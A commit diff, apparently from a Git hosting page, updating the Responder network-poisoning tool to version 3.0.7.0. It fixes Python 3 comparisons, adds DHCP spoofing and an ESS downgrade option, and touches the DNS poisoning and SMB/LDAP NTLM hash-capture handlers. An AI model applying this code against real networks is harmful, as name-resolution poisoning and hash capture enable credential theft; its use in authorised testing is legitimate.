|
||||
s.sendto(NetworkSendBufferPython2or3(packet), Host)
|
||||
|
||||
def DHCP():
|
||||
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
|
||||
s.bind((Interface, 0x0800))
|
||||
SendDiscover()
|
||||
while True:
|
||||
data = s.recvfrom(65535)
|
||||
if data[0][23:24] == b"\x11":# is udp?
|
||||
SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
|
||||
if SrcPort == 67 or DstPort == 67:
|
||||
ClientIP = socket.inet_ntoa(data[0][26:30])
|
||||
ret = ParseDHCPCode(data[0][42:], ClientIP)
|
||||
if ret:
|
||||
print(text("[*] [DHCP] %s" % ret))
|
||||
@@ -39,14 +39,14 @@ class DNS(BaseRequestHandler):
|
||||
|
||||
try:
|
||||
data, soc = self.request
|
||||
if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "A" and settings.Config.AnalyzeMode == False:
|
||||
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A" and settings.Config.AnalyzeMode == False:
|
||||
buff = DNS_Ans()
|
||||
buff.calculate(NetworkRecvBufferPython2or3(data))
|
||||
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
|
||||
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
|
||||
print(color("[*] [DNS] A Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
|
||||
|
||||
if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "SRV" and settings.Config.AnalyzeMode == False:
|
||||
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV" and settings.Config.AnalyzeMode == False:
|
||||
buff = DNS_SRV_Ans()
|
||||
buff.calculate(NetworkRecvBufferPython2or3(data))
|
||||
soc.sendto(NetworkSendBufferPython2or3(buff), self.client_address)
|
||||
@@ -65,14 +65,14 @@ class DNSTCP(BaseRequestHandler):
|
||||
|
||||
try:
|
||||
data = self.request.recv(1024)
|
||||
if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "A" and settings.Config.AnalyzeMode is False:
|
||||
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A" and settings.Config.AnalyzeMode is False:
|
||||
buff = DNS_Ans()
|
||||
buff.calculate(NetworkRecvBufferPython2or3(data))
|
||||
self.request.send(NetworkSendBufferPython2or3(buff))
|
||||
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
|
||||
print(color("[*] [DNS] A Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1))
|
||||
|
||||
if ParseDNSType(NetworkRecvBufferPython2or3(data)) is "SRV" and settings.Config.AnalyzeMode == False:
|
||||
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV" and settings.Config.AnalyzeMode == False:
|
||||
buff = DNS_SRV_Ans()
|
||||
buff.calculate(NetworkRecvBufferPython2or3(data))
|
||||
self.request.send(NetworkSendBufferPython2or3(buff))
|
||||
|
||||
@@ -40,11 +40,11 @@ def CalculateDNSName(name):
|
||||
def ParseCLDAPNetlogon(data):
|
||||
try:
|
||||
Dns = data.find(b'DnsDomain')
|
||||
if Dns is -1:
|
||||
if Dns == -1:
|
||||
return False
|
||||
DnsName = data[Dns+9:]
|
||||
DnsGuidOff = data.find(b'DomainGuid')
|
||||
if DnsGuidOff is -1:
|
||||
if DnsGuidOff == -1:
|
||||
return False
|
||||
Guid = data[DnsGuidOff+10:]
|
||||
if Dns:
|
||||
@@ -72,13 +72,13 @@ def ParseSearch(data):
|
||||
t.calculate()
|
||||
return str(t)
|
||||
|
||||
elif re.search(b'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
|
||||
if re.search(b'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
|
||||
return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=TID,MessageIDASN2Str=TID))
|
||||
|
||||
elif re.search(b'(?i)(objectClass0*.*supportedCapabilities)', data):
|
||||
return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=TID,MessageIDASN2Str=TID))
|
||||
|
||||
if re.search(b'(objectClass)', data):
|
||||
elif re.search(b'(objectClass)', data):
|
||||
return str(LDAPSearchDefaultPacket(MessageIDASNStr=TID))
|
||||
|
||||
def ParseLDAPHash(data,client, Challenge): #Parse LDAP NTLMSSP v1/v2
|
||||
|
||||
@@ -47,7 +47,7 @@ def Chose3264x(packet):
|
||||
|
||||
def FindNTLMOpcode(data):
|
||||
SSPIStart = data.find(b'NTLMSSP')
|
||||
if SSPIStart is -1:
|
||||
if SSPIStart == -1:
|
||||
return False
|
||||
SSPIString = data[SSPIStart:]
|
||||
return SSPIString[8:12]
|
||||
|
||||
@@ -219,7 +219,7 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
|
||||
self.request.send(NetworkSendBufferPython2or3(buffer1))
|
||||
data = self.request.recv(1024)
|
||||
|
||||
## Session Setup 1 answer SMBv2.
|
||||
## Nego answer SMBv2.
|
||||
if data[16:18] == b"\x00\x00" and data[4:5] == b"\xfe":
|
||||
head = SMB2Header(MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'))
|
||||
t = SMB2NegoAns(Dialect="\x10\x02")
|
||||
@@ -238,7 +238,7 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
|
||||
self.request.send(NetworkSendBufferPython2or3(buffer1))
|
||||
data = self.request.recv(1024)
|
||||
## Session Setup 3 answer SMBv2.
|
||||
if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' and data[4:5] == b'\xfe':
|
||||
if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' or GrabMessageID(data)[0:1] == b'\x03' and data[4:5] == b'\xfe':
|
||||
ParseSMBHash(data, self.client_address[0], Challenge)
|
||||
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data).decode('latin-1'))
|
||||
t = SMB2Session2Data()
|
||||
@@ -333,7 +333,7 @@ class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
|
||||
class SMB1LM(BaseRequestHandler): # SMB Server class, old version
|
||||
def handle(self):
|
||||
try:
|
||||
self.request.settimeout(0.5)
|
||||
self.request.settimeout(1)
|
||||
data = self.request.recv(1024)
|
||||
Challenge = RandomChallenge()
|
||||
if data[0] == b"\x81": #session request 139
|
||||
|
||||
12
settings.py
Normal file → Executable file
12
settings.py
Normal file → Executable file
@@ -23,7 +23,7 @@ import subprocess
|
||||
|
||||
from utils import *
|
||||
|
||||
__version__ = 'Responder 3.0.6.0'
|
||||
__version__ = 'Responder 3.0.7.0'
|
||||
|
||||
class Settings:
|
||||
|
||||
@@ -68,7 +68,7 @@ class Settings:
|
||||
|
||||
def populate(self, options):
|
||||
|
||||
if options.Interface is None and utils.IsOsX() is False:
|
||||
if options.Interface == None and utils.IsOsX() == False:
|
||||
print(utils.color("Error: -I <if> mandatory option is missing", 1))
|
||||
sys.exit(-1)
|
||||
|
||||
@@ -144,7 +144,7 @@ class Settings:
|
||||
self.WPAD_Script = config.get('HTTP Server', 'WPADScript')
|
||||
self.HtmlToInject = config.get('HTTP Server', 'HtmlToInject')
|
||||
|
||||
if self.Serve_Exe is True:
|
||||
if self.Serve_Exe == True:
|
||||
if not os.path.exists(self.Html_Filename):
|
||||
print(utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1))
|
||||
|
||||
@@ -164,6 +164,7 @@ class Settings:
|
||||
#Generate Random stuff for one Responder session
|
||||
self.MachineName = 'WIN-'+''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(11)])
|
||||
self.Domain = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(4)])
|
||||
self.DHCPHostname = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)])
|
||||
self.DomainName = self.Domain + '.LOCAL'
|
||||
self.MachineNego = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)]) +'$@'+self.DomainName
|
||||
self.RPCPort = random.randrange(45000, 49999)
|
||||
@@ -176,9 +177,10 @@ class Settings:
|
||||
# CLI options
|
||||
self.ExternalIP = options.ExternalIP
|
||||
self.LM_On_Off = options.LM_On_Off
|
||||
self.NOESS_On_Off = options.NOESS_On_Off
|
||||
self.WPAD_On_Off = options.WPAD_On_Off
|
||||
self.Wredirect = options.Wredirect
|
||||
self.NBTNSDomain = options.NBTNSDomain
|
||||
self.DHCP_On_Off = options.DHCP_On_Off
|
||||
self.Basic = options.Basic
|
||||
self.Finger_On_Off = options.Finger
|
||||
self.Interface = options.Interface
|
||||
@@ -193,7 +195,7 @@ class Settings:
|
||||
if self.ExternalIP:
|
||||
self.ExternalIPAton = socket.inet_aton(self.ExternalIP)
|
||||
|
||||
if self.HtmlToInject is None:
|
||||
if self.HtmlToInject == None:
|
||||
self.HtmlToInject = ''
|
||||
|
||||
self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
|
||||
|
||||
@@ -22,7 +22,7 @@ from odict import OrderedDict
|
||||
import errno
|
||||
import optparse
|
||||
from RunFingerPackets import *
|
||||
__version__ = "1.2"
|
||||
__version__ = "1.3"
|
||||
|
||||
parser = optparse.OptionParser(usage='python %prog -i 10.10.10.224\nor:\npython %prog -i 10.10.10.0/24', version=__version__, prog=sys.argv[0])
|
||||
|
||||
@@ -169,7 +169,10 @@ def dtoa(d):
|
||||
|
||||
def OsNameClientVersion(data):
|
||||
try:
|
||||
length = struct.unpack('<H',data[43:45].encode('latin-1'))[0]
|
||||
if PY2OR3 == "PY3":
|
||||
length = struct.unpack('<H',data[43:45].encode('latin-1'))[0]
|
||||
else:
|
||||
length = struct.unpack('<H',data[43:45])[0]
|
||||
if length > 255:
|
||||
OsVersion, ClientVersion = tuple([e.replace("\x00", "") for e in data[47+length:].split('\x00\x00\x00')[:2]])
|
||||
return OsVersion, ClientVersion
|
||||
|
||||
3
utils.py
Normal file → Executable file
3
utils.py
Normal file → Executable file
@@ -369,6 +369,7 @@ def StartupMessage():
|
||||
print(' %-27s' % "LLMNR" + enabled)
|
||||
print(' %-27s' % "NBT-NS" + enabled)
|
||||
print(' %-27s' % "DNS/MDNS" + enabled)
|
||||
print(' %-27s' % "DHCP" + (enabled if settings.Config.DHCP_On_Off else disabled))
|
||||
print('')
|
||||
|
||||
print(color("[+] ", 2, 1) + "Servers:")
|
||||
@@ -403,6 +404,7 @@ def StartupMessage():
|
||||
print(' %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled))
|
||||
print(' %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled))
|
||||
print(' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled))
|
||||
print(' %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True or settings.Config.LM_On_Off == True else disabled))
|
||||
print(' %-27s' % "Fingerprint hosts" + (enabled if settings.Config.Finger_On_Off == True else disabled))
|
||||
print('')
|
||||
|
||||
@@ -428,3 +430,4 @@ def StartupMessage():
|
||||
print(' %-27s' % "Responder Machine Name" + color('[%s]' % settings.Config.MachineName, 5, 1))
|
||||
print(' %-27s' % "Responder Domain Name" + color('[%s]' % settings.Config.DomainName, 5, 1))
|
||||
print(' %-27s' % "Responder DCE-RPC Port " + color('[%s]' % settings.Config.RPCPort, 5, 1))
|
||||
|
||||
|
||||
Reference in New Issue
Block a user